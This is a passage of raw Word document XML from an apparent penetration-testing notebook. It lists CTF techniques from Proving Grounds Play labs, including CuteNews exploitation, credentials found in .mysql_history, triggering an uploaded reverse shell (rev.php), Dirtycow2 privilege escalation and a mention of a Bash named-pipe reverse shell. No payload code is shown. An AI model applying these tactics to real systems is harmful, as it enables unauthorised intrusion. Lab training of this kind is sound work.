          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Named Pipe Reverse Shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. And it's written in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="572"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And also, make sure to change the cookie within the Network tool. Changing within the Cookie Extension can cause some problems, at least in my experience</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7im3l8kgkyk4" w:id="509"/>
      <w:bookmarkEnd w:id="509"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CuteNews</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1188">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BBSCute</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we exploited a website that used CuteNews. It was kind of challenging since a lot of the github exploits didn't work, and it was hard to get the files from searchsploit into metasploit, so it's worth a read</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037EF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_75fpc29566e7" w:id="510"/>
      <w:bookmarkEnd w:id="510"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scrolling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1189">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Gaara</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play box, there was a web page that looked blank, but you had to scroll down to the bottom to see something</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xu8cnol71gjq" w:id="511"/>
      <w:bookmarkEnd w:id="511"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the flag as a password for an account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is so cheeky. But in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1190">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cybersploit1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, they gave us a username, and made the password to the account the same thing as the first flag (cybersploit{youtube.com/c/cybersploit}).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e80wftz4qhgu" w:id="512"/>
      <w:bookmarkEnd w:id="512"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">textpattern</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037FA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037FB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The text pattern CMS had an interesting attack vector as seen on </w:t>
      </w:r>
      <w:hyperlink r:id="rId1191">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">driftingblues6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. It was simple and easy though</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037FE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s5y0nidva9rq" w:id="513"/>
      <w:bookmarkEnd w:id="513"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.mysql_history</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000037FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003800">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the FunboxRookie PG Play, there was a file called ".mysql_history" within /home/tom that had credentials, but those credentials were actually for the tom account, not for SQL, so it allowed me to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since running the command asked me for password and I now know Tom's password, and it worked.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003801">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003802">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003803">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x8rotjxos0x7" w:id="514"/>
      <w:bookmarkEnd w:id="514"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading files when there are multiple web servers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003804">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003805">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1192">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Katana</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, there were multiple web servers (multiple open ports), and there was an upload endpoint on one of the webservers. However, when you upload something like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rev.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then try and access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/rev.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on that website, it didn't trigger the reverse shell. You actually had to try and access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/rev.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the other web servers, and then it got a 504 error, but the rev shell was triggered. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003806">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003807">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003808">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3tk26vyh4wuv" w:id="515"/>
      <w:bookmarkEnd w:id="515"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fernet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003809">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000380A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fernet is a symmetric encryption method. It was first seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1193">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">PyExec</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG play. Inside of a MySQL database, we found a row with a token and a key. We had to put that into this </w:t>
      </w:r>
      <w:hyperlink r:id="rId1194">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">website</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId1195">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://asecuritysite.com/tokens/ferdecode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) in order to decode the message</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000380B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000380C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000380D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fiq7l7pd3zkq" w:id="516"/>
      <w:bookmarkEnd w:id="516"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirtycow2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000380E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I've seen Dirtycow 2 being used twice so far in PG Play. Like </w:t>
      </w:r>
      <w:hyperlink r:id="rId1196">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sumo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:hyperlink r:id="rId1197">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Lapiao</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000380F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003810">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003811">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003812">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tlcixo4cgket" w:id="517"/>
      <w:bookmarkEnd w:id="517"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
